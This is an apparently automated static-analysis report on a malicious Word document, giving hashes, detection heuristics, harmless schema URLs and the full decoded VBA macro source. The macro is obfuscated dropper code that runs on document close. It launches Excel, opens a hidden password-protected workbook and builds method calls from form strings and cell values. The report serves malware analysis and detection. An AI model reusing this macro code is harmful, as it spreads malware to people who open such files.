Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0f356cc5a6815644…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 71.1 KB
Created: 2021-01-20 13:09:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-01-23

MD5: 5ef37800e61b1c1103696ebea8dba55b
SHA-1: cfd911283af7184325c5a2310921696d986c39c9
SHA-256: 0f356cc5a68156449aeef5254a76ad43c996dd27c4961724b3e7d2d43e34b783

Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-10033904-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
  • VBA project inside OOXML [medium] (2 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set tcm = CreateObject(UserForm1.ComboBox1)
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script:
    xa = CallByName(Application, jx9z, 2)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label shows which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below is an XML namespace identifier of the kind Word declares in any OOXML package, not a network indicator.
    Channel for all 28 URLs below: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8499 bytes
SHA-256: 2f674b414aa20c83d98b77e4431908924599658d8e278fdb6eb9145adb5ea076
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public igm, trl, q5, gqnef, rc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim tcm
vgof = Application.Options.AutoFormatAsYouTypeApplyHeadings
If nt > 762 Then
akesl = Application.Options.CursorMovement
nt = akesl
nt = Application.Options.ShowDiacritics
If lgm2 > 1979 Then
cvq7g = Application.Options.AutoFormatReplaceHyperlinks
lgm2 = cvq7g
End If
End If
Set tcm = CreateObject(UserForm1.ComboBox1)
tcm.DisplayAlerts = False
jx9z = "visible"
eb = "OnTime"
Dim g45
wzmdm = 1
tdo = 1
While wzmdm <> 0 And tdo < 3
Set g45 = tcm.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
wzmdm = Err.Number
tdo = tdo + 1
Wend
If wzmdm <> 0 Then
xa = CallByName(Application, jx9z, 2)
If xa = True Then
zr = Application.Options.ApplyFarEastFontsToAscii
If vgof > 2786 Then
f7 = Application.Options.ShowReadabilityStatistics
vgof = f7
End If
Set p2um8 = CreateObject(UserForm1.ComboBox3)
p2um8.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p2um8.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
tcm.Quit
Exit Sub
End If
Dim fy3
Set fy3 = tcm.sheets(1)
uzg = "'"
ej = tcm.sheets(3).Cells(255, 37).Value
trl = tcm.sheets(2).Cells(158, 49).Value
igm = fy3.Cells(228, 36).Value
j1dn = tcm.sheets(2).Cells(204, 12).Value
sz = tcm.sheets(3).Cells(109, 47).Value
ul2 = Application.Options.ShowFormatError
If zr > 934 Then
fbww = Application.Options.IgnoreInternetAndFileAddresses
zr = fbww
End If
pk = Application.Options.CursorMovement
If ul2 > 1832 Then
zo = Application.Options.ButtonFieldClicks
ul2 = zo
End If
zvetl = Application.CentimetersToPoints(97)
tl = tcm.sheets(3).Cells(189, 27).Value
oh = tcm.sheets(2).Cells(65, 13).Value
vl = tcm.sheets(3).Cells(102, 36).Value
koch = tcm.sheets(1).Cells(92, 29).Value
td = tcm.sheets(2).Cells(21, 2).Value
ta68v = tcm.sheets(1).Cells(167, 7).Value
gck = tcm.sheets(3).Cells(148, 34).Value
dv = Application.Options.AllowCombinedAuxiliaryForms
zg = tcm.sheets(2).Cells(54, 10).Value
h20 = tcm.sheets(3).Cells(26, 1).Value
h42w = Application.Options.MatchFuzzyTC
If dv > 1073 Then
z3 = Application.Options.AllowCompoundNounProcessing
dv = z3
End If
lwo = tcm.sheets(3).Cells(149, 47).Value
p8 = tcm.sheets(3).Cells(223, 34).Value
hn46k = fy3.Cells(158, 27).Value
bf = tcm.sheets(2).Cells(165, 8).Value
g4w8 = tcm.sheets(1).Cells(40, 37).Value
va = tcm.sheets(3).Cells(122, 49).Value
sb4w = tcm.sheets(1).Cells(114, 21).Value
p4v = tcm.sheets(2).Cells(125, 33).Value
rc = fy3.Cells(119, 3).Value
k9g = tcm.sheets(1).Cells(251, 29).Value
pl = Application.Options.SavePropertiesPrompt
If h42w > 3731 Then
ze6 = Application.Options.SnapToShapes
h42w = ze6
End If
kf5w = Application.Options.AutoFormatReplaceOrdinals
If pl > 4118 Then
hs = Application.Options.AutoWordSelection
pl = hs
End If
raq = tcm.sheets(2).Cells(140, 11).Value
dg3f = tcm.sheets(1).Cells(212, 13).Value
kfhr = CallByName(tcm, ej, 2)
Set ev7q = UserForm1.Controls.Add("Forms.ComboBox.1")
ev7q.Value = oh & kfhr & va
Set i32 = UserForm1.Controls.Add("Forms.ComboBox.1")
i32.Value = raq
rz = Application.Options.DefaultTrayID
If kf5w > 439 Then
fm = Application.Options.InterpretHighAnsi
kf5w = fm
End If
CallByName CreateObject(ta68v), zg, 1, ev7q, sz, i32
Set c2u = CreateObject(p4v)
fkk0 = Application.Options.StoreRSIDOnSave
Set e5 = CallByName(c2u, lwo, 2)
Set v7 = CallByName(e5, sb4w, 1)
Set bf = CallByName(c2u, bf, 2)
Set gqnef = c2u
Set j1dn = CallByName(bf, j1dn, 2)
Set koch = CallByName(j1dn, koch, 2)
Set lgm2 = CallByName(koch, dg3f, 1, g4w8)
Set igm = CallByName(lgm2, igm, 2)
h20 = CallByName(igm, h20, 2)
CallByName igm, gck, 1, 1, h20
Set q5 = UserForm1.Controls.Add("Forms.ComboBox.1")
q5.Value = tl & hn46k
UserForm3.ComboBox1 = td
zy6 = Application.Options.AutoFormatReplacePlainTextEmphasis
pd = Application.Options.MatchFuzzyAY
If zy6 > 3886 Then
b8 = Application.Options.MeasurementUnit
zy6 = b8
End If
gfus = Application.Options.DefaultBorderLineStyle
If pd > 2064 Then
g6 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
pd = g6
End If
q5.Value = k9g
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = h20
c2u = Nothing
g45 = Nothing
fy3 = Nothing
h4ik = Application.Options.EnableMisusedWordsDictionary
If gfus > 561 Then
obc2 = Application.Options.ShowDiacritics
gfus = obc2
End If
ns = Application.Options.PictureWrapType
If h4ik > 2792 Then
sn398 = Application.Options.GridDistanceHorizontal
h4ik = sn398
End If
e5 = Nothing
v7 = Nothing
bv1g = Application.Options.UpdateLinksAtOpen
If ns > 270 Then
dq = Application.Options.AutoFormatApplyFirstIndents
ns = dq
End If
bf = Nothing
j1dn = Nothing
koch = Nothing
lgm2 = Nothing
igm = Nothing
ktak = Application.Options.MatchFuzzyZJ
If bv1g > 2334 Then
ugj = Application.Options.Pagination
bv1g = ugj
End If
gqnef = Nothing
egkw = Application.Options.AutoFormatAsYouTypeApplyDates
If ktak > 306 Then
ddpc2 = Application.Options.UseGermanSpellingReform
ktak = ddpc2
End If
DoEvents
CallByName tcm, vl, 1
tcm = Nothing
DoEvents
CallByName CreateObject(ta68v), p8, 1, oh & kfhr & va
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{DA80DBBA-3439-4291-868B-CC0EE5925740}{48987118-6E32-40EE-A906-681F1B765345}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{335DB42C-0D1E-4237-928F-8F5FD863D4A2}{78CE41EA-3C78-4963-89F2-FA312A2BFB07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 On Error GoTo ErrorHandler

 dx = UserForm2.Controls.Count - 1
 
 If Len(UserForm1.ComboBox4) > 10 Then
 dx = dx * 2
 End If

 bb = ""
 For xr = 1 To dx Step 2
 bb = bb & UserForm2.Controls.Item(xr)
 Next

 ComboBox1.AddItem "ek"
 ComboBox1.AddItem "zo"
 ComboBox1.AddItem bb
 ComboBox1.AddItem "x9se1"
 

ly8b4 = Application.Options.DisableFeaturesIntroducedAfterbyDefault

If xr > 1268 Then


j6 = Application.Options.StrictFinalYaa

xr = j6

End If


o9 = Application.Options.SmartParaSelection

If ly8b4 > 4176 Then


h5sy = Application.Options.SaveInterval

ly8b4 = h5sy

End If

 Exit Sub
 

xy = Application.Options.MatchFuzzyBV

If o9 > 1034 Then


slc5g = Application.Options.PasteAdjustTableFormatting

o9 = slc5g

End If

ErrorHandler:
 

so = Application.Options.AutoFormatReplaceFarEastDashes

If xy > 2060 Then


wgha4 = Application.Options.DefaultBorderColorIndex

xy = wgha4

End If

 

ii = Application.Options.RTFInClipboard

If so > 4151 Then


nc = Application.Options.AddHebDoubleQuote

so = nc

End If

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{28A33F87-65DF-4D7D-BAA5-8B68F1445670}{C2A291CB-FC1E-429F-A84B-58F3B870CBE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.igm, ActiveDocument.trl, VbMethod, ActiveDocument.q5
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C3B0F944-5E73-4AF4-AE7A-F086AFBDD659}{0ED11120-939E-492B-849B-B6E258E83617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.gqnef, ActiveDocument.rc, VbMethod, ActiveDocument.q5
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 43008 bytes
SHA-256: e676cce80f15042864e9276c7de6f57fe42856dcf4365ba88162ef29299435fb
Detection: ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely